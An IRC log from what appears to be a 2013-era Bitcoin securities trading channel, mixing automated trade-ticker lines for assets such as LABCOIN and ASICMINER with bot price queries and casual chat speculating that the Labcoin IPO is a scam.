[ACTIVEMINING] 17 @ 0.005705 = 0.097 BTC [-] Aug 07 20:53:44 [HAVELOCK] [AM100] 10 @ 0.0398 = 0.398 BTC [+] Aug 07 20:53:57 [HAVELOCK] [XBOND] 152 @ 0.00102998 = 0.1566 BTC [+] Aug 07 20:54:56 [HAVELOCK] [AM100] 1 @ 0.0398 BTC [+] Aug 07 20:56:37 [HAVELOCK] [AM100] 2 @ 0.0398 = 0.0796 BTC [+] Aug 07 20:57:02 [BTCTC] [DMS.MINING] 3 @ 0.005604 = 0.0168 BTC [-] Aug 07 20:58:14 [HAVELOCK] [LABCO] 23 @ 0.00169999 = 0.0391 BTC [-] Aug 07 20:58:25 [HAVELOCK] [XBOND] 6 @ 0.00102998 = 0.0062 BTC [+] Aug 07 21:00:18 [BTCTC] [LABCOIN] 1000 @ 0.001288 = 1.288 BTC [-] Aug 07 21:01:26 [HAVELOCK] [LABCO] 27 @ 0.00169999 = 0.0459 BTC [-] Aug 07 21:02:10 [BTCTC] [BMF] 10 @ 0.035 = 0.35 BTC [+] Aug 07 21:02:22 [HAVELOCK] [AM1] 1 @ 3.9796 BTC [-] Aug 07 21:02:51 [HAVELOCK] [AM100] 7 @ 0.0398 = 0.2786 BTC [+] Aug 07 21:02:59 [HAVELOCK] [AM100] 1 @ 0.03985 BTC [+] Aug 07 21:03:03 [HAVELOCK] [XBOND] 442 @ 0.00102998 = 0.4553 BTC [+] Aug 07 21:03:12 [HAVELOCK] [AM100] 1 @ 0.03986 BTC [+] Aug 07 21:03:28 [HAVELOCK] [AM100] 1 @ 0.03987 BTC [+] Aug 07 21:03:30 [HAVELOCK] [AM100] 1 @ 0.03988 BTC [+] Aug 07 21:03:33 [HAVELOCK] [AM100] 1 @ 0.03989 BTC [+] Aug 07 21:03:39 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Aug 07 21:03:54 [HAVELOCK] [XBOND] 25 @ 0.00102999 = 0.0257 BTC [+] Aug 07 21:04:40 [BTCTC] [TAT.ASICMINER] 2 @ 0.03742 = 0.0748 BTC [-] Aug 07 21:04:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.03743 = 0.1123 BTC [+] Aug 07 21:04:48 [HAVELOCK] [XBOND] 3975 @ 0.00102999 = 4.0942 BTC [+] Aug 07 21:04:50 [HAVELOCK] [XBOND] 100 @ 0.00102999 = 0.103 BTC [+] Aug 07 21:04:53 [HAVELOCK] [XBOND] 43925 @ 0.00103 = 45.2428 BTC [+] Aug 07 21:06:07 [HAVELOCK] [XBOND] 85 @ 0.00102999 = 0.0875 BTC [-] Aug 07 21:06:34 [HAVELOCK] [XBOND] 16 @ 0.00103 = 0.0165 BTC [+] Aug 07 21:09:10 [HAVELOCK] [XBOND] 9 @ 0.00103 = 0.0093 BTC [+] Aug 07 21:09:38 !help Aug 07 21:09:39 List of commands: Aug 07 21:09:40 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Aug 07 21:09:41 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Aug 07 21:09:42 !mp (desc: returns the response from MPEX order) Aug 07 21:09:43 !rules (desc: chan guidelines) {short: !r} Aug 07 21:09:44 !exchanges (desc: lists exchanges and brokers) {short: !e} Aug 07 21:10:35 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Aug 07 21:10:54 [BTCTC] [DMS.MINING] 1 @ 0.005604 BTC [-] Aug 07 21:11:09 [BTCTC] [ACTIVEMINING] 50 @ 0.005701 = 0.2851 BTC [-] Aug 07 21:11:11 [BTCTC] [DMS.SELLING] 1 @ 0.022 BTC [-] Aug 07 21:11:16 [BTCTC] [ACTIVEMINING] 30 @ 0.0057 = 0.171 BTC [-] Aug 07 21:11:50 [BTCTC] [LABCOIN] 935 @ 0.001288 = 1.2043 BTC [-] Aug 07 21:11:51 [BTCTC] [LABCOIN] 6 @ 0.001262 = 0.0076 BTC [-] Aug 07 21:11:53 [BTCTC] [LABCOIN] 50 @ 0.001261 = 0.0631 BTC [-] Aug 07 21:11:55 [BTCTC] [LABCOIN] 7 @ 0.001246 = 0.0087 BTC [-] Aug 07 21:11:58 [BTCTC] [LABCOIN] 60 @ 0.001245 = 0.0747 BTC [-] Aug 07 21:12:01 [BTCTC] [LABCOIN] 5 @ 0.001238 = 0.0062 BTC [-] Aug 07 21:12:03 [BTCTC] [BASIC-MINING] 6 @ 0.3696 = 2.2176 BTC [-] Aug 07 21:12:04 [BTCTC] [LABCOIN] 44 @ 0.001237 = 0.0544 BTC [-] Aug 07 21:12:05 [BTCTC] [LABCOIN] 125 @ 0.001236 = 0.1545 BTC [-] Aug 07 21:12:07 [BTCTC] [BASIC-MINING] 3 @ 0.3697 = 1.1091 BTC [+] Aug 07 21:12:08 [BTCTC] [LABCOIN] 32 @ 0.001236 = 0.0396 BTC [-] Aug 07 21:12:12 [BTCTC] [LABCOIN] 1000 @ 0.001235 = 1.235 BTC [-] Aug 07 21:12:14 [BTCTC] [LABCOIN] 800 @ 0.001234 = 0.9872 BTC [-] Aug 07 21:12:19 [BTCTC] [LABCOIN] 1250 @ 0.001234 = 1.5425 BTC [-] Aug 07 21:12:21 [BTCTC] [BMF] 8 @ 0.04299 = 0.3439 BTC [+] Aug 07 21:12:22 [BTCTC] [LABCOIN] 5686 @ 0.001233 = 7.0108 BTC [-] Aug 07 21:13:40 [BTCTC] [ASICMINER-PT] 1 @ 3.825 BTC [+] Aug 07 21:13:42 [BTCTC] [ASICMINER-PT] 3 @ 3.824 = 11.472 BTC [-] Aug 07 21:14:11 [BTCTC] [BFMINES] 5 @ 0.003982 = 0.0199 BTC [-] Aug 07 21:14:13 [HAVELOCK] [AM100] 4 @ 0.0399 = 0.1596 BTC [+] Aug 07 21:14:32 [BTCTC] [LABCOIN] 50 @ 0.001254 = 0.0627 BTC [+] Aug 07 21:14:34 [HAVELOCK] [XBOND] 24 @ 0.00103 = 0.0247 BTC [+] Aug 07 21:14:37 [BTCTC] [LABCOIN] 235 @ 0.001253 = 0.2945 BTC [-] Aug 07 21:14:38 [BTCTC] [LABCOIN] 4314 @ 0.001233 = 5.3192 BTC [-] Aug 07 21:14:40 [BTCTC] [LABCOIN] 6 @ 0.001229 = 0.0074 BTC [-] Aug 07 21:14:42 [BTCTC] [LABCOIN] 50 @ 0.001228 = 0.0614 BTC [-] Aug 07 21:14:45 [BTCTC] [LABCOIN] 551 @ 0.001168 = 0.6436 BTC [-] Aug 07 21:14:47 [BTCTC] [LABCOIN] 5000 @ 0.001167 = 5.835 BTC [-] Aug 07 21:14:49 [BTCTC] [LABCOIN] 590 @ 0.001167 = 0.6885 BTC [-] Aug 07 21:14:55 [BTCTC] [LABCOIN] 50 @ 0.001167 = 0.0584 BTC [-] Aug 07 21:15:24 [HAVELOCK] [SMG] 2 @ 0.0002387 = 0.0005 BTC [-] Aug 07 21:15:30 [HAVELOCK] [SMG] 1 @ 0.0002387 BTC [-] Aug 07 21:16:31 [BTCTC] [LABCOIN] 12 @ 0.001167 = 0.014 BTC [-] Aug 07 21:17:02 [BTCTC] [ACTIVEMINING] 4 @ 0.005769 = 0.0231 BTC [+] Aug 07 21:17:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.03798 BTC [+] Aug 07 21:18:21 [BTCTC] [LABCOIN] 90 @ 0.00163 = 0.1467 BTC [+] Aug 07 21:18:23 [HAVELOCK] [XBOND] 42 @ 0.00103 = 0.0433 BTC [+] Aug 07 21:19:18 [HAVELOCK] [XBOND] 300 @ 0.00103 = 0.309 BTC [+] Aug 07 21:19:37 [HAVELOCK] [XBOND] 7 @ 0.00103 = 0.0072 BTC [+] Aug 07 21:19:39 [BTCTC] [ACTIVEMINING] 9 @ 0.005705 = 0.0513 BTC [-] Aug 07 21:20:04 [HAVELOCK] [XBOND] 60 @ 0.00103 = 0.0618 BTC [+] Aug 07 21:20:16 [HAVELOCK] [XBOND] 10 @ 0.00103 = 0.0103 BTC [+] Aug 07 21:20:21 [BTCTC] [LABCOIN] 7 @ 0.001239 = 0.0087 BTC [-] Aug 07 21:20:26 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [+] Aug 07 21:20:29 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [+] Aug 07 21:21:33 [BTCTC] [DMS.MINING] 1 @ 0.0061 BTC [+] Aug 07 21:21:34 [BTCTC] [BASIC-MINING] 3 @ 0.3697 = 1.1091 BTC [-] Aug 07 21:21:59 [HAVELOCK] [AM100] 2 @ 0.0398 = 0.0796 BTC [-] Aug 07 21:22:17 [BTCTC] [LABCOIN] 4 @ 0.001232 = 0.0049 BTC [-] Aug 07 21:22:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.03798 BTC [+] Aug 07 21:22:42 [BTCTC] [LABCOIN] 1 @ 0.001232 BTC [-] Aug 07 21:22:56 [BTCTC] [LABCOIN] 46 @ 0.001231 = 0.0566 BTC [-] Aug 07 21:23:25 [BTCTC] [LABCOIN] 1 @ 0.00123 BTC [-] Aug 07 21:23:31 [BTCTC] [LABCOIN] 29 @ 0.001229 = 0.0356 BTC [-] Aug 07 21:23:55 [BTCTC] [LABCOIN] 10 @ 0.001228 = 0.0123 BTC [-] Aug 07 21:23:57 [BTCTC] [LABCOIN] 227 @ 0.00123 = 0.2792 BTC [+] Aug 07 21:23:59 [BTCTC] [LABCOIN] 10 @ 0.00123 = 0.0123 BTC [+] Aug 07 21:24:14 [BTCTC] [LABCOIN] 50 @ 0.001211 = 0.0606 BTC [-] Aug 07 21:24:15 [BTCTC] [LABCOIN] 150 @ 0.00121 = 0.1815 BTC [-] Aug 07 21:25:07 [BTCTC] [LABCOIN] 50 @ 0.001229 = 0.0615 BTC [+] Aug 07 21:25:22 [BTCTC] [DMS.SELLING] 9 @ 0.02289 = 0.206 BTC [+] Aug 07 21:25:35 [BTCTC] [LABCOIN] 1176 @ 0.001228 = 1.4441 BTC [-] Aug 07 21:26:18 [BTCTC] [LABCOIN] 1 @ 0.00123 BTC [+] Aug 07 21:26:29 New ASICMINER Poll Questions: https://docs.google.com/forms/d/15Ws1XzJeynK_vsKiQ9NaufQfLZOSKsRfsSgqMLTdIRs Aug 07 21:27:25 [BTCTC] [DMS.MINING] 7 @ 0.005605 = 0.0392 BTC [-] Aug 07 21:27:27 [BTCTC] [DMS.MINING] 56 @ 0.005604 = 0.3138 BTC [-] Aug 07 21:27:28 [BTCTC] [DMS.MINING] 25 @ 0.005603 = 0.1401 BTC [-] Aug 07 21:27:29 [BTCTC] [DMS.MINING] 100 @ 0.005602 = 0.5602 BTC [-] Aug 07 21:27:30 [BTCTC] [DMS.MINING] 15 @ 0.005602 = 0.084 BTC [-] Aug 07 21:27:32 [BTCTC] [DMS.MINING] 100 @ 0.005501 = 0.5501 BTC [-] Aug 07 21:27:33 [BTCTC] [DMS.MINING] 350 @ 0.0055 = 1.925 BTC [-] Aug 07 21:27:42 [HAVELOCK] [SMG] 1 @ 0.0002387 BTC [-] Aug 07 21:27:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.03797 BTC [-] Aug 07 21:27:58 good shit ThickAsThieves Aug 07 21:28:09 yep already answered Aug 07 21:28:15 but anybody can vote? Aug 07 21:28:27 yes Aug 07 21:28:48 [HAVELOCK] [XBOND] 2 @ 0.00103 = 0.0021 BTC [+] Aug 07 21:28:59 [HAVELOCK] [AM100] 1 @ 0.0396 BTC [-] Aug 07 21:29:19 [HAVELOCK] [LABCO] 1 @ 0.00176 BTC [+] Aug 07 21:30:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.03797 BTC [-] Aug 07 21:30:31 hmm, okay then it's not exactly reflective of purely shareholder interests but certainly better than nothing Aug 07 21:30:45 it's not an official service Aug 07 21:30:55 just something AM cooperates with Aug 07 21:31:15 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 07 21:31:16 [BTCTC] [LABCOIN] 15 @ 0.001251 = 0.0188 BTC [+] Aug 07 21:31:17 [BTCTC] [LABCOIN] 236 @ 0.001265 = 0.2985 BTC [+] Aug 07 21:31:19 making it more exact would be more work and to what end? Aug 07 21:31:19 [BTCTC] [LABCOIN] 1 @ 0.001266 BTC [+] Aug 07 21:31:28 [BTCTC] [DMS.MINING] 1 @ 0.006 BTC [+] Aug 07 21:31:36 i like it Aug 07 21:31:44 [BTCTC] [LABCOIN] 3782 @ 0.001265 = 4.7842 BTC [-] Aug 07 21:31:56 serves its purpose fine Aug 07 21:32:13 [BTCTC] [LABCOIN] 126 @ 0.001278 = 0.161 BTC [+] Aug 07 21:32:18 Labcoin gonna tell all today, sometime. https://bitcointalk.org/index.php?topic=263445.msg2885737#msg2885737 Aug 07 21:32:37 [BTCTC] [LABCOIN] 1000 @ 0.001279 = 1.279 BTC [+] Aug 07 21:32:46 [BTCTC] [LABCOIN] 12 @ 0.001279 = 0.0153 BTC [+] Aug 07 21:32:47 [BTCTC] [ASICMINER-PT] 1 @ 3.884 BTC [+] Aug 07 21:32:49 [BTCTC] [ASICMINER-PT] 1 @ 3.885 BTC [+] Aug 07 21:32:50 [HAVELOCK] [AM100] 1 @ 0.0396 BTC [-] Aug 07 21:32:59 [BTCTC] [LABCOIN] 50 @ 0.00128 = 0.064 BTC [+] Aug 07 21:33:01 [BTCTC] [LABCOIN] 2 @ 0.001278 = 0.0026 BTC [-] Aug 07 21:33:02 [BTCTC] [LABCOIN] 1000 @ 0.001231 = 1.231 BTC [-] Aug 07 21:33:03 [BTCTC] [LABCOIN] 6 @ 0.00123 = 0.0074 BTC [-] Aug 07 21:33:05 [BTCTC] [LABCOIN] 7187 @ 0.00123 = 8.84 BTC [-] Aug 07 21:33:05 [BTCTC] [LABCOIN] 4 @ 0.001278 = 0.0051 BTC [+] Aug 07 21:33:07 [BTCTC] [LABCOIN] 27 @ 0.001278 = 0.0345 BTC [+] Aug 07 21:33:19 [BTCTC] [LABCOIN] 32 @ 0.001278 = 0.0409 BTC [+] Aug 07 21:33:23 ThickAsThieves we betting ? Aug 07 21:33:24 Sam noi huh Aug 07 21:33:34 sounds like psuedonym Aug 07 21:33:36 what's the bet? Aug 07 21:33:38 [BTCTC] [LABCOIN] 50 @ 0.001298 = 0.0649 BTC [+] Aug 07 21:33:39 [BTCTC] [LABCOIN] 27 @ 0.001299 = 0.0351 BTC [+] Aug 07 21:33:41 [BTCTC] [DMS.MINING] 1 @ 0.005279 BTC [-] Aug 07 21:33:43 [BTCTC] [DMS.MINING] 50 @ 0.005004 = 0.2502 BTC [-] Aug 07 21:33:56 what the telling will be Aug 07 21:34:06 what side you want? Aug 07 21:34:12 [BTCTC] [LABCOIN] 150 @ 0.0013 = 0.195 BTC [+] Aug 07 21:34:30 well wait, which sides are there ? i'm sorta going with the "we're terribly excited to announce how excited we will be once we announce our excitement" Aug 07 21:34:38 [BTCTC] [LABCOIN] 8 @ 0.001299 = 0.0104 BTC [-] Aug 07 21:34:39 [BTCTC] [LABCOIN] 32 @ 0.0013 = 0.0416 BTC [+] Aug 07 21:34:48 [HAVELOCK] [LABCO] 21 @ 0.00169999 = 0.0357 BTC [-] Aug 07 21:34:57 i'm going with the furuknap defense Aug 07 21:34:59 [BTCTC] [LABCOIN] 5 @ 0.0013 = 0.0065 BTC [+] Aug 07 21:35:08 just meaningless words Aug 07 21:35:11 what's that ? o. Aug 07 21:35:26 this will force them into a corner hopefully Aug 07 21:35:26 well kinda hard to distinguish, my pseudoquote above would perhaps count Aug 07 21:35:34 [BTCTC] [LABCOIN] 1 @ 0.0013 BTC [+] Aug 07 21:35:37 [BTCTC] [LABCOIN] 28 @ 0.0013 = 0.0364 BTC [+] Aug 07 21:35:38 [BTCTC] [LABCOIN] 2 @ 0.001329 = 0.0027 BTC [+] Aug 07 21:35:38 [BTCTC] [LABCOIN] 20 @ 0.00133 = 0.0266 BTC [+] Aug 07 21:35:44 labcoin pumping Aug 07 21:35:54 pfft Aug 07 21:36:05 well the impression give is that this is more of an AMA Aug 07 21:36:05 [BTCTC] [DMS.MINING] 4 @ 0.00501 = 0.02 BTC [+] Aug 07 21:36:06 [BTCTC] [TAT.MINIGAME] 6 @ 0.0002249 = 0.0013 BTC [-] Aug 07 21:36:08 [BTCTC] [TAT.MINIGAME] 75 @ 0.000222 = 0.0167 BTC [-] Aug 07 21:36:09 then a PR announcement Aug 07 21:36:15 given* Aug 07 21:36:16 [BTCTC] [LABCOIN] 187 @ 0.001331 = 0.2489 BTC [+] Aug 07 21:36:17 [BTCTC] [LABCOIN] 313 @ 0.001332 = 0.4169 BTC [+] Aug 07 21:36:19 i just think every ipo is a scam Aug 07 21:36:20 than* Aug 07 21:36:25 [BTCTC] [DMS.MINING] 4 @ 0.00501 = 0.02 BTC [+] Aug 07 21:36:29 it doesn't really matter what it is Aug 07 21:36:30 [HAVELOCK] [AM100] 3 @ 0.0396 = 0.1188 BTC [-] Aug 07 21:36:37 it's a good starting posititon jcpham Aug 07 21:36:48 [BTCTC] [LABCOIN] 1 @ 0.00133 BTC [-] Aug 07 21:36:49 history has proven me right Aug 07 21:36:50 [BTCTC] [LABCOIN] 15 @ 0.00133 = 0.02 BTC [-] Aug 07 21:36:58 jcpham: it's fun to ride the wave though :) Aug 07 21:37:02 fabrizzio was chillin in the otc yesterday Aug 07 21:37:09 i guess if you like scam waves Aug 07 21:37:10 whodat Aug 07 21:37:10 [BTCTC] [LABCOIN] 35 @ 0.00133 = 0.0466 BTC [-] Aug 07 21:37:12 jcpham it's important to keep track of the precious few that aren't, rather than succumb to generalisation. Aug 07 21:37:15 wait until the SEC has al of your info Aug 07 21:37:28 this attitude is crucial for long term success. otherwise the scammers win much like the politicians won the same thing in the us./ Aug 07 21:37:45 i think my problem is one of location Aug 07 21:37:55 that may be. Aug 07 21:38:02 [BTCTC] [LABCOIN] 15 @ 0.00133 = 0.02 BTC [-] Aug 07 21:38:19 jcpham: all what info? a few bitcoin addresses and a gmail account? Aug 07 21:38:29 why is creativex on labcoin's nuts anyway? Aug 07 21:38:30 yeah, i'm not afraid of that :p Aug 07 21:38:31 you can't be part of the race to the stars if you live in 1960s chile, you can't be part of bitcoin if you live in today's third world. Aug 07 21:38:33 isn't he an issuer? Aug 07 21:38:44 "today's third world" Aug 07 21:38:47 cute Aug 07 21:39:05 the intellectual 3rd world? Aug 07 21:39:06 tis teh sad yet cute truth Aug 07 21:39:20 it was concise Aug 07 21:39:24 i got the joke Aug 07 21:39:44 you should hear people talk on the street Aug 07 21:39:44 cutetruth isn't such a bad name Aug 07 21:39:45 [HAVELOCK] [AM100] 1 @ 0.0396 BTC [-] Aug 07 21:39:48 for like a pop singer chick Aug 07 21:40:02 it's bad to actually hear the stupidity in progress Aug 07 21:40:26 sit on a park bench in the city for an hour and listen to strangers walk by on their cell phones Aug 07 21:41:26 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 07 21:41:27 [BTCTC] [DMS.MINING] 34 @ 0.005026 = 0.1709 BTC [+] Aug 07 21:42:16 [HAVELOCK] [XBOND] 33 @ 0.00103 = 0.034 BTC [+] Aug 07 21:42:20 [HAVELOCK] [AM100] 1 @ 0.0395 BTC [-] Aug 07 21:42:50 [BTCTC] [LABCOIN] 4 @ 0.001329 = 0.0053 BTC [-] Aug 07 21:42:51 [BTCTC] [LABCOIN] 34 @ 0.00133 = 0.0452 BTC [+] Aug 07 21:42:52 [BTCTC] [LABCOIN] 82 @ 0.001331 = 0.1091 BTC [+] Aug 07 21:43:00 [BTCTC] [DMS.PURCHASE] 1 @ 0.02828 BTC [-] Aug 07 21:43:58 [BTCTC] [BASIC-MINING] 9 @ 0.3697 = 3.3273 BTC [-] Aug 07 21:44:45 [BTCTC] [ASICMINER-PT] 3 @ 3.895 = 11.685 BTC [+] Aug 07 21:44:56 [BTCTC] [LABCOIN] 148 @ 0.001331 = 0.197 BTC [+] Aug 07 21:44:57 [BTCTC] [LABCOIN] 1105 @ 0.001332 = 1.4719 BTC [+] Aug 07 21:46:34 [BTCTC] [ASICMINER-PT] 1 @ 3.896 BTC [+] Aug 07 21:46:36 [BTCTC] [ASICMINER-PT] 1 @ 3.896 BTC [+] Aug 07 21:46:37 [BTCTC] [ASICMINER-PT] 4 @ 3.898 = 15.592 BTC [+] Aug 07 21:46:57 I'm actually curious if they have a guy come out later and give good answers. Aug 07 21:47:08 amazes me how some people sell before dividends and buy back after lol Aug 07 21:47:17 [HAVELOCK] [XBOND] 2 @ 0.00103 = 0.0021 BTC [+] Aug 07 21:48:45 sell,sell,sell! opps dividends! buy, buy,buy! Aug 07 21:49:56 [HAVELOCK] [HIM] 1 @ 0.14 BTC [-] Aug 07 21:50:43 [BTCTC] [LABCOIN] 8 @ 0.001331 = 0.0106 BTC [-] Aug 07 21:50:51 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [-] Aug 07 21:50:52 [BTCTC] [BASIC-MINING] 7 @ 0.3201 = 2.2407 BTC [-] Aug 07 21:50:53 [BTCTC] [BASIC-MINING] 4 @ 0.32 = 1.28 BTC [-] Aug 07 21:50:54 [BTCTC] [BASIC-MINING] 5 @ 0.32 = 1.6 BTC [-] Aug 07 21:50:55 [BTCTC] [BASIC-MINING] 6 @ 0.3128 = 1.8768 BTC [-] Aug 07 21:50:56 [BTCTC] [BASIC-MINING] 1 @ 0.3127 BTC [-] Aug 07 21:50:57 [BTCTC] [BASIC-MINING] 1 @ 0.3126 BTC [-] Aug 07 21:51:28 [HAVELOCK] [XBOND] 300 @ 0.00103 = 0.309 BTC [+] Aug 07 21:52:07 [BTCTC] [ASICMINER-PT] 3 @ 3.899 = 11.697 BTC [+] Aug 07 21:52:14 [HAVELOCK] [AM100] 2 @ 0.0391 = 0.0782 BTC [-] Aug 07 21:52:17 [HAVELOCK] [LABCO] 25 @ 0.00176 = 0.044 BTC [+] Aug 07 21:52:25 [BTCTC] [DMS.MINING] 59 @ 0.005992 = 0.3535 BTC [+] Aug 07 21:52:25 [BTCTC] [DMS.MINING] 20 @ 0.005993 = 0.1199 BTC [+] Aug 07 21:52:26 [BTCTC] [DMS.MINING] 9 @ 0.005998 = 0.054 BTC [+] Aug 07 21:52:27 [BTCTC] [DMS.MINING] 40 @ 0.005999 = 0.24 BTC [+] Aug 07 21:52:29 [BTCTC] [DMS.SELLING] 2 @ 0.023 = 0.046 BTC [+] Aug 07 21:52:44 [HAVELOCK] [AM100] 2 @ 0.0392 = 0.0784 BTC [+] Aug 07 21:53:15 [BTCTC] [TAT.ASICMINER] 13 @ 0.03793 = 0.4931 BTC [-] Aug 07 21:53:27 [BTCTC] [ASICMINER-PT] 3 @ 4.55 = 13.65 BTC [+] Aug 07 21:53:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03793 = 0.0759 BTC [-] Aug 07 21:53:57 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [-] Aug 07 21:54:15 [BTCTC] [LABCOIN] 10 @ 0.001331 = 0.0133 BTC [-] Aug 07 21:54:16 [BTCTC] [LABCOIN] 82 @ 0.001332 = 0.1092 BTC [+] Aug 07 21:54:16 [BTCTC] [LABCOIN] 100 @ 0.001333 = 0.1333 BTC [+] Aug 07 21:54:18 [BTCTC] [LABCOIN] 800 @ 0.001334 = 1.0672 BTC [+] Aug 07 21:54:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.03793 = 0.0759 BTC [-] Aug 07 21:54:38 they better Aug 07 21:54:58 i want them to answer every fucking question, no beating around the bush and shit Aug 07 21:55:24 if its a legit company then i want some legit answers Aug 07 21:55:30 bitches Aug 07 21:56:04 [BTCTC] [LABCOIN] 8 @ 0.001334 = 0.0107 BTC [+] Aug 07 21:57:29 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [-] Aug 07 21:57:38 "There will be updates on this as well. I will be in contact with Burnside. All I can say is that the LABCOIN Founder and Developer core is bound by the news update and is not selling shares. This will be verified by Burnside soon enough." Aug 07 21:57:41 Yeah we'll see Aug 07 21:59:50 What is the scoop on Labcoin? Aug 07 22:00:26 [BTCTC] [LABCOIN] 3 @ 0.001338 = 0.004 BTC [+] Aug 07 22:00:27 [BTCTC] [LABCOIN] 50 @ 0.001339 = 0.067 BTC [+] Aug 07 22:00:29 [BTCTC] [LABCOIN] 125 @ 0.001347 = 0.1684 BTC [+] Aug 07 22:00:30 [BTCTC] [LABCOIN] 372 @ 0.001348 = 0.5015 BTC [+] Aug 07 22:01:18 The scoop is founders want to sell their shares for an inflated price. Aug 07 22:01:31 Hahaha. Aug 07 22:01:37 bcoinnews.com Aug 07 22:01:41 that is up to date Aug 07 22:02:04 Wait, didn't they say they had no interest in that?! ;) Aug 07 22:02:34 what Namworld said, adding "their shares in nothing" Aug 07 22:07:29 [BTCTC] [ACTIVEMINING] 50 @ 0.005706 = 0.2853 BTC [+] Aug 07 22:07:30 [BTCTC] [ACTIVEMINING] 1 @ 0.005705 BTC [-] Aug 07 22:07:32 [BTCTC] [ACTIVEMINING] 3030 @ 0.0057 = 17.271 BTC [-] Aug 07 22:07:37 [BTCTC] [LABCOIN] 400 @ 0.001346 = 0.5384 BTC [-] Aug 07 22:09:04 [BTCTC] [LABCOIN] 119 @ 0.001345 = 0.1601 BTC [-] Aug 07 22:09:05 [BTCTC] [LABCOIN] 1911 @ 0.001346 = 2.5722 BTC [+] Aug 07 22:09:07 [BTCTC] [LABCOIN] 78 @ 0.001347 = 0.1051 BTC [+] Aug 07 22:09:08 [BTCTC] [LABCOIN] 628 @ 0.001348 = 0.8465 BTC [+] Aug 07 22:09:09 [BTCTC] [LABCOIN] 666 @ 0.001382 = 0.9204 BTC [+] Aug 07 22:09:10 [BTCTC] [LABCOIN] 5000 @ 0.001383 = 6.915 BTC [+] Aug 07 22:09:11 [BTCTC] [LABCOIN] 332 @ 0.001384 = 0.4595 BTC [+] Aug 07 22:09:12 [BTCTC] [LABCOIN] 312 @ 0.001386 = 0.4324 BTC [+] Aug 07 22:09:13 [BTCTC] [LABCOIN] 2500 @ 0.001387 = 3.4675 BTC [+] Aug 07 22:10:24 [HAVELOCK] [AM100] 2 @ 0.03919999 = 0.0784 BTC [-] Aug 07 22:11:12 !ticker btctco DMS.SELLING Aug 07 22:11:13 [BTCT:DMS.SELLING] 1D: 0.022 / 0.02295 / 0.02319 (81 shares, 1.9 BTC), 7D: 0.0201 / 0.02255 / 0.0264 (16836 shares, 379.6 BTC), 30D: 0.0176 / 0.02396 / 0.035716 (59161 shares, 1417.6 BTC) Aug 07 22:11:20 !last btctco DMS.SELLING Aug 07 22:11:20 Have you got any tobacco? Aug 07 22:11:29 !last btctc DMS.SELLING Aug 07 22:11:30 Last trade for DMS.SELLING on BTCTC was at 0.023 BTC [+] Aug 07 22:12:36 @Namworld, I can't seem to find the source for your labcoin information? Where does it say they are trying to sell? Aug 07 22:12:43 [BTCTC] [LABCOIN] 143 @ 0.001388 = 0.1985 BTC [+] Aug 07 22:12:45 [BTCTC] [LABCOIN] 947 @ 0.001389 = 1.3154 BTC [+] Aug 07 22:12:46 [BTCTC] [LABCOIN] 1 @ 0.001389 BTC [+] Aug 07 22:12:47 [BTCTC] [LABCOIN] 200 @ 0.00139 = 0.278 BTC [+] Aug 07 22:12:48 [BTCTC] [LABCOIN] 3 @ 0.001396 = 0.0042 BTC [+] Aug 07 22:12:49 [BTCTC] [LABCOIN] 50 @ 0.001397 = 0.0699 BTC [+] Aug 07 22:12:50 [BTCTC] [LABCOIN] 256 @ 0.001398 = 0.3579 BTC [+] Aug 07 22:12:52 [BTCTC] [LABCOIN] 50 @ 0.001399 = 0.07 BTC [+] Aug 07 22:12:53 [BTCTC] [LABCOIN] 2000 @ 0.0014 = 2.8 BTC [+] Aug 07 22:12:54 [BTCTC] [LABCOIN] 28 @ 0.001419 = 0.0397 BTC [+] Aug 07 22:12:54 [BTCTC] [LABCOIN] 100 @ 0.00142 = 0.142 BTC [+] Aug 07 22:12:55 [BTCTC] [LABCOIN] 125 @ 0.001421 = 0.1776 BTC [+] Aug 07 22:12:56 [BTCTC] [LABCOIN] 897 @ 0.001432 = 1.2845 BTC [+] Aug 07 22:12:57 [BTCTC] [LABCOIN] 1833 @ 0.001433 = 2.6267 BTC [+] Aug 07 22:13:03 go scamcoin go Aug 07 22:13:08 :P Aug 07 22:13:48 [BTCTC] [LABCOIN] 1 @ 0.001433 BTC [+] Aug 07 22:15:37 [BTCTC] [BTCGARDEN] 2 @ 0.01599 = 0.032 BTC [-] Aug 07 22:15:55 It just occured to me that those ads about making 71 dollars an hour (I think almost all of them have 71 for some reason) and like X grand a month. Well I make more than that. Aug 07 22:16:33 *claps* Aug 07 22:17:02 [BTCTC] [ACTIVEMINING] 2 @ 0.005777 = 0.0116 BTC [+] Aug 07 22:17:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.03786 = 0.0757 BTC [-] Aug 07 22:17:44 [BTCTC] [BFMINES] 5 @ 0.00345 = 0.0173 BTC [-] Aug 07 22:17:45 [BTCTC] [BFMINES] 118 @ 0.0034 = 0.4012 BTC [-] Aug 07 22:17:47 [BTCTC] [TAT.ASICMINER] 65 @ 0.03786 = 2.4609 BTC [-] Aug 07 22:17:48 [BTCTC] [TAT.ASICMINER] 2 @ 0.03787 = 0.0757 BTC [+] Aug 07 22:18:52 [BTCTC] [BFMINES] 12 @ 0.003287 = 0.0394 BTC [-] Aug 07 22:18:54 [BTCTC] [BFMINES] 25 @ 0.003286 = 0.0822 BTC [-] Aug 07 22:18:55 [BTCTC] [BFMINES] 227 @ 0.003286 = 0.7459 BTC [-] Aug 07 22:18:56 [BTCTC] [BFMINES] 2500 @ 0.003281 = 8.2025 BTC [-] Aug 07 22:20:20 [BTCTC] [DMS.SELLING] 48 @ 0.023 = 1.104 BTC [+] Aug 07 22:23:29 